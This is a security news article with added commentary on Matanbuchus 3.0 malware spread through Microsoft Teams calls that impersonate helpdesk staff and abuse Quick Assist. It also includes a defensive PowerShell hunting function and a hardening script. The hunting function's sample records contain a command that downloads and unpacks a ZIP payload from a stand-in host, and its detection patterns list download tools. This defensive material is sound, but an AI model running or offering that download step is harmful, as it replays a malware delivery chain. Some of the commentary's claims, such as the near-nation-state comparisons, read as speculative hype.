Microsoft Teams Used to Spread Dangerous Malware: Matanbuchus 30 Strikes Again


Cybercriminals Now Impersonate IT Helpdesks to Breach Corporate Systems

Hackers have found a new weapon in their arsenal—and it’s hiding in your video calls. Matanbuchus, a stealthy malware-as-a-service (MaaS) platform, has evolved into one of the most dangerous digital threats of 2025. Security researchers have confirmed that cybercriminals are now leveraging Microsoft Teams calls to deliver this malicious software, often impersonating IT helpdesk personnel to trick unsuspecting employees. The latest version, Matanbuchus 3.0, carries powerful upgrades that make it even harder to detect and defend against. Companies using Microsoft Teams without strict access controls are now prime targets for this rapidly spreading malware.

Microsoft Teams Becomes a Malware Delivery Platform

Matanbuchus 3.0 is the latest evolution of a malware loader first spotted on the dark web in 2021, initially sold for $2,500. It was created to inject malicious payloads directly into system memory, making it extremely hard to trace. In 2022, researchers identified its role in spreading Cobalt Strike beacons during major spam campaigns. Today, Morphisec researchers reveal that Matanbuchus has stepped up its game by exploiting Microsoft Teams, the workplace communication tool used by millions.

Attackers pose as IT helpdesk agents in Microsoft Teams and initiate a video or voice call. They trick users into launching Quick Assist, a built-in Windows remote support tool, giving attackers full control over the device. Once access is granted, the user is instructed to run a PowerShell script that downloads a malicious ZIP file containing the Matanbuchus loader. The malware is deployed using DLL side-loading, a method that bypasses many traditional security defenses.
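The chain just described leaves a recognisable footprint in process-creation telemetry: a shell whose parent is Quick Assist, a command line that downloads and unpacks an archive, and then a binary launched from a user-writable directory. The following hunting function is an added example, not code from the article or from Morphisec; it takes records in the shape of Sysmon Event ID 1 (Image, ParentImage, CommandLine), and the sample records embedded in it are constructed, with every hostname, user, domain and path invented for illustration.

```powershell
# Added example (not from the article or Morphisec): hunt process-creation telemetry for the
# Quick Assist -> PowerShell download -> side-loaded binary chain.
# The records below are constructed in the shape of Sysmon Event ID 1; all values are invented.
$sampleEvents = @(
    [pscustomobject]@{
        Time = '2025-07-16T09:12:01'; Host = 'WS-0412'; User = 'CORP\jdoe'
        ParentImage = 'C:\Windows\System32\svchost.exe'
        Image       = 'C:\Program Files\WindowsApps\MicrosoftCorporationII.QuickAssist_x64\QuickAssist.exe'
        CommandLine = 'QuickAssist.exe'                                   # the remote session itself: no alert
    }
    [pscustomobject]@{
        Time = '2025-07-16T09:14:37'; Host = 'WS-0412'; User = 'CORP\jdoe'
        ParentImage = 'C:\Program Files\WindowsApps\MicrosoftCorporationII.QuickAssist_x64\QuickAssist.exe'
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell.exe -c "Invoke-WebRequest http://support-portal.example.invalid/pkg.zip -OutFile $env:TEMP\pkg.zip; Expand-Archive $env:TEMP\pkg.zip $env:LOCALAPPDATA\SupportTool"'
    }
    [pscustomobject]@{
        Time = '2025-07-16T09:14:52'; Host = 'WS-0412'; User = 'CORP\jdoe'
        ParentImage = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        Image       = 'C:\Users\jdoe\AppData\Local\SupportTool\host.exe'   # placeholder for a signed host binary
        CommandLine = 'host.exe'
    }
    [pscustomobject]@{
        Time = '2025-07-16T09:20:10'; Host = 'WS-0199'; User = 'CORP\asmith'
        ParentImage = 'C:\Windows\explorer.exe'
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell.exe -c "Get-ChildItem C:\Reports"'      # routine use: must not alert
    }
)

function Find-QuickAssistChain {
    param([Parameter(Mandatory)][object[]]$Events)

    $downloadPattern = 'Invoke-WebRequest|\biwr\b|Invoke-RestMethod|DownloadFile|DownloadString|\bcurl\b|\bwget\b|Start-BitsTransfer'
    $archivePattern  = 'Expand-Archive|ZipFile|\.zip\b'
    $userWritable    = '\\Users\\[^\\]+\\(AppData|Downloads)\\|\\Windows\\Temp\\|\\ProgramData\\'
    $shells          = @('powershell.exe', 'pwsh.exe', 'cmd.exe')

    $alerts = @(foreach ($e in $Events) {
        # Compare on file names only; splitting on either slash keeps this portable
        $image  = ($e.Image -split '[\\/]')[-1].ToLowerInvariant()
        $parent = ($e.ParentImage -split '[\\/]')[-1].ToLowerInvariant()

        if ($parent -eq 'quickassist.exe' -and $image -in $shells) {
            # Stage 1: a shell started from inside a remote-assistance session
            $severity = 'Medium'; $reason = 'Shell spawned by Quick Assist'
            if ($e.CommandLine -match $downloadPattern) {
                $severity = 'High'; $reason = 'Quick Assist child shell downloads content'
                if ($e.CommandLine -match $archivePattern) { $reason += ' and unpacks an archive' }
            }
        }
        elseif ($parent -in $shells -and $e.Image -match $userWritable) {
            # Stage 2: a shell launches a binary out of a user-writable directory,
            # the shape a side-loading host executable takes once the ZIP is unpacked
            $severity = 'High'; $reason = 'Shell started a binary from a user-writable path'
        }
        else { continue }

        [pscustomobject]@{
            Time = $e.Time; Host = $e.Host; User = $e.User
            Severity = $severity; Reason = $reason
            Process = $e.Image; CommandLine = $e.CommandLine
        }
    })
    return $alerts
}

$hits = Find-QuickAssistChain -Events $sampleEvents
$hits | Sort-Object Time | Format-Table Time, Host, Severity, Reason -AutoSize
```

Run against the constructed records, the function raises two alerts for WS-0412 (the downloading shell under Quick Assist and the binary launched from AppData) and nothing for the routine PowerShell use on WS-0199. In production the same logic would be fed from Sysmon or EDR process events rather than an inline array; the parent-child relationship is the strong signal here, because the article's chain cannot avoid it, while the command-line patterns only raise severity.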

Matanbuchus 3.0 features new enhancements, including a switch to Salsa20 encryption for its command-and-control (C2) communications and string obfuscation, making it significantly more stealthy. It uses custom syscalls to avoid Windows API detection and employs the MurmurHash3 hashing technique to confuse reverse engineering efforts.

Once installed, it can run PowerShell commands, EXEs, DLLs, shellcode, and other malicious payloads. It collects user and system information such as usernames, domains, OS versions, and whether the user has administrator privileges. The malware even scans for existing antivirus or endpoint detection tools and adjusts its behavior accordingly.

Researchers have declared Matanbuchus 3.0 a sophisticated threat, citing its evasive capabilities, flexible post-infection controls, and increasing popularity among cybercriminals. Indicators of compromise (IOCs), including known malware samples and domains, have been published to aid in detection and prevention.

What Undercode Says:

Sophistication at Its Peak in Malware Engineering

Matanbuchus 3.0 illustrates a troubling trend: the fusion of advanced technical evasion with persuasive social engineering. The attackers are no longer relying solely on backdoors and phishing emails. Instead, they are now integrating themselves into daily workflows—Teams calls, IT conversations, and remote assistance tools—blending in until it’s too late.

The use of Microsoft Teams as an attack vector is a strategic choice. It’s ubiquitous, it’s trusted, and it’s rarely monitored as a threat vector by many security teams. Most employees would never suspect a Teams call as malicious—especially if it appears to come from internal IT. This makes the delivery method not only effective but highly scalable for attackers.

Another alarming aspect is the abuse of Quick Assist, a legitimate Windows utility. Cybercriminals are essentially using built-in features of the OS to execute high-risk actions, bypassing traditional endpoint defenses. This approach underscores a larger problem: attackers are exploiting trust—trust in applications, in IT teams, and in communication platforms.

Matanbuchus 3.0’s technical upgrades make detection significantly harder. The move from RC4 to Salsa20 for obfuscation and encryption improves data security from the attacker’s side while making it harder for defenders to decode traffic. Its anti-sandboxing capabilities and syscall-based API evasion are hallmarks of malware designed to escape both static and dynamic analysis.

Resolving the Windows API functions it needs through MurmurHash3 hashes of their names, rather than referencing them in plain text, adds another layer of complexity for reverse engineers. This means fewer recognizable patterns and more obfuscated execution paths. These features together indicate that the developers behind Matanbuchus are not just skilled—they are likely operating at a level close to nation-state actors.

From a business security standpoint, this raises significant concerns. It highlights how essential it is for organizations to tighten external access policies, especially in Microsoft Teams. Most enterprises still allow some level of external communication, often for client or vendor meetings. Attackers exploit this trust boundary.
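The two controls this section and the Quick Assist discussion point to can both be applied with Microsoft's own cmdlets. The script below is an added example and not code from the article: part 1 assumes the MicrosoftTeams PowerShell module and a Teams administrator account, with the partner domains as placeholders for your own vendor and client domains; part 2 assumes an elevated session on a managed endpoint (or the same commands delivered through your management tooling).

```powershell
# Added example, not code from the article. Part 1 needs the MicrosoftTeams module and a
# Teams administrator; the partner domains are placeholders. Part 2 runs elevated on endpoints.

# ---- Part 1: replace open Teams federation with an explicit allow list ----
Import-Module MicrosoftTeams
Connect-MicrosoftTeams

# Record the current posture before changing it
Get-CsTenantFederationConfiguration |
    Select-Object AllowFederatedUsers, AllowTeamsConsumer, AllowPublicUsers, AllowedDomains

$partnerDomains = @('partner-one.example', 'partner-two.example')   # placeholder values
$allowList = New-CsEdgeAllowList -AllowedDomain @(
    $partnerDomains | ForEach-Object { New-CsEdgeDomainPattern -Domain $_ }
)

# Federation stays on, but only for the listed domains. Unmanaged Teams and Skype
# consumer accounts, the easiest identities for an impostor to obtain, are cut off.
Set-CsTenantFederationConfiguration -AllowFederatedUsers $true -AllowedDomains $allowList `
    -AllowTeamsConsumer $false -AllowPublicUsers $false

# ---- Part 2: remove Quick Assist where the helpdesk does not actually use it ----
# Store-delivered package on current Windows 10/11 builds
Get-AppxPackage -AllUsers -Name 'MicrosoftCorporationII.QuickAssist' |
    Remove-AppxPackage -AllUsers
Get-AppxProvisionedPackage -Online |
    Where-Object DisplayName -eq 'MicrosoftCorporationII.QuickAssist' |
    Remove-AppxProvisionedPackage -Online
# Older builds shipped it as a Windows capability instead
Get-WindowsCapability -Online -Name 'App.Support.QuickAssist*' |
    Where-Object State -eq 'Installed' |
    Remove-WindowsCapability -Online
```

The federation change is tenant-wide and takes effect for every user, so the `Get-CsTenantFederationConfiguration` output is worth saving before the change and diffing afterwards. If the helpdesk does rely on Quick Assist, the second part should be replaced by an allow list of the helpdesk's own accounts and a monitoring rule on sessions, since the article's chain still depends on the user being talked into starting the tool.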

Matanbuchus also adjusts based on the security posture of its victim, adapting its payload execution method depending on the installed AV or EDR tools. That level of context-awareness indicates real-time intelligence feeding into the malware—a feature once reserved for only the most elite threats.

The implications go far beyond malware infection. Matanbuchus serves as a gateway to larger attacks, such as ransomware or data exfiltration campaigns. Once installed, it can easily deploy additional payloads, perform privilege escalation, and even exfiltrate sensitive data.

For security teams, this means incident response plans must evolve. Traditional detection methods won’t cut it. Advanced behavioral analysis, machine learning models, and threat hunting protocols will be necessary to detect and stop Matanbuchus-like threats in real time.

Matanbuchus’s presence on the dark web as a Malware-as-a-Service also means it is accessible to lower-tier criminals. This democratization of advanced malware creates a larger, more persistent threat surface for businesses globally.

🔍 Fact Checker Results

✅ Microsoft Teams is being actively exploited by Matanbuchus 3.0 operators for initial malware deployment
✅ Morphisec’s detailed analysis confirms the malware’s advanced obfuscation and post-compromise features
❌ No evidence suggests this malware is currently being neutralized at scale by antivirus tools

📊 Prediction

Expect a surge in social engineering-based attacks over Microsoft Teams and similar collaboration platforms in the next 12 months. If current trends continue, Matanbuchus or its variants may become a top 5 malware threat globally. Organizations that delay tightening external access policies and fail to monitor remote support tools will face increased risk of high-impact cyber intrusions.

References:

Reported By: www.bleepingcomputer.com